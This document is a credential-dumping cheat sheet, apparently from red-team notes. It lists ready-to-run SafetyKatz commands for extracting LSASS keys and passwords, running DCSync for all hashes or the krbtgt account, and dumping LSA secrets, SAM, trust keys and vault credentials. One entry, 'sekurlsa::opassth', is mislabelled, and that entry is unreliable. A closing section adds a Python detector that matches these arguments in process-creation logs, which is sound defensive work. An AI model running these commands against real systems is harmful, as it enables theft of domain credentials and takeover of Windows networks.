# dumping-credentials

> [!INFO] Remember to follow the binaries methodology

## SafetyKatz

**Extracts Kerberos encryption keys (AES/NTLM) from LSASS:**

```batchfile
SafetyKatz.exe "sekurlsa::ekeys" "exit"
```

**Alternative to `ekeys` for Kerberos key extraction:**

```batchfile
SafetyKatz.exe "sekurlsa::keys" "exit"
```

**Performs DCSync to pull all domain user hashes (requires Domain Admin (DA) rights):**

```batchfile
SafetyKatz.exe "lsadump::dcsync" "exit"
```

**DCSync for a specific user (e.g., krbtgt for Golden Tickets):**

```batchfile
SafetyKatz.exe "lsadump::dcsync /user:DOMAIN\krbtgt" "exit"
```

**Dumps plaintext passwords and NTLM hashes from LSASS:**

```batchfile
SafetyKatz.exe "sekurlsa::logonpasswords" "exit"
```

**Retrieves LSA secrets (cached domain creds, service accounts):**

```batchfile
SafetyKatz.exe "lsadump::lsa /patch" "exit"
```

**Extracts domain trust keys (for Golden Ticket attacks across forests):**

```batchfile
SafetyKatz.exe "lsadump::trust" "exit"
```

**Dumps local SAM database (non-domain user hashes):**

```batchfile
SafetyKatz.exe "lsadump::sam" "exit"
```

**Lists saved credentials in Windows Vault (e.g., RDP/Wi-Fi passwords):**

```batchfile
SafetyKatz.exe "vault::list" "exit"
```

**Decrypts and extracts Windows Vault credentials:**

```batchfile
SafetyKatz.exe "vault::cred /patch" "exit"
```

**Parses an LSASS memory dump (offline credential extraction):**

```batchfile
SafetyKatz.exe "sekurlsa::minidump lsass.dmp" "exit"
```

**Extracts Kerberos TGTs for Pass-the-Ticket attacks:**

```batchfile
SafetyKatz.exe "sekurlsa::opassth" "exit"
```
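
**Detection example (added here, not part of the original page or of SafetyKatz):** every command above passes a `module::command` argument (`sekurlsa::`, `lsadump::`, `vault::`) on the command line, so process-creation logs can be matched on those arguments instead of the binary name. The event dictionaries below are constructed samples using Sysmon Event ID 1 field names, and the ATT&CK mapping is this example's own choice.

```python
import re

# Mimikatz-style "module::command" arguments, matched regardless of the binary's file name.
MODULE_CMD = re.compile(r"\b(sekurlsa|lsadump|vault)::([a-z]+)", re.IGNORECASE)

# ATT&CK sub-techniques for commands listed on this page.
TECHNIQUE = {
    ("lsadump", "dcsync"): "T1003.006",  # DCSync
    ("lsadump", "sam"): "T1003.002",     # Security Account Manager
    ("lsadump", "lsa"): "T1003.004",     # LSA Secrets
}
# Fallback per module when the command has no specific entry above.
MODULE_DEFAULT = {
    "sekurlsa": "T1003.001",  # LSASS Memory
    "lsadump": "T1003",       # OS Credential Dumping
    "vault": "T1555.004",     # Windows Credential Manager
}

def classify(command_line):
    """Return sorted (module::command, technique) hits found in one command line."""
    hits = set()
    for module, cmd in MODULE_CMD.findall(command_line):
        key = (module.lower(), cmd.lower())
        hits.add((f"{key[0]}::{key[1]}", TECHNIQUE.get(key, MODULE_DEFAULT[key[0]])))
    return sorted(hits)

def scan(events):
    """Return one alert per process-creation event that carries a credential-dumping call."""
    alerts = []
    for ev in events:
        hits = classify(ev.get("CommandLine", ""))
        if hits:
            alerts.append({"host": ev["Computer"], "user": ev["User"],
                           "image": ev["Image"], "hits": hits})
    return alerts

# Constructed sample events (hosts, users and paths are made up for this example).
SAMPLE_EVENTS = [
    {"Computer": "ws01.corp.example", "User": r"CORP\alice", "Image": r"C:\Temp\SafetyKatz.exe",
     "CommandLine": 'SafetyKatz.exe "sekurlsa::ekeys" "exit"'},
    {"Computer": "ws02.corp.example", "User": r"CORP\bob", "Image": r"C:\Temp\svc.exe",
     "CommandLine": r'svc.exe "LSADUMP::DCSync /user:DOMAIN\krbtgt" "exit"'},
    {"Computer": "ws03.corp.example", "User": r"CORP\carol", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Computer": "ws03.corp.example", "User": r"CORP\carol", "Image": r"C:\Temp\SafetyKatz.exe",
     "CommandLine": 'SafetyKatz.exe "vault::list" "exit"'},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

This only sees arguments that reach the process-creation log, so it complements LSASS handle-access monitoring and directory-replication auditing on domain controllers and does not replace them.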
